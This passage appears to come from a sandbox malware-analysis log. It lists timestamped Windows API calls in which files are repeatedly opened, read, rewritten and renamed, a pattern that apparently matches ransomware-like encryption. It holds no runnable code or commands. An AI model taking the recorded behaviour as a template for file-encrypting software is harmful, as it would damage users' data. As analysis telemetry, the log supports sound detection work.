"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,821", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,881", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:47,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:47,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,031", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,031", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,051", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,051", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,071", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,111", "api": "NtWriteFile"}, {"category": 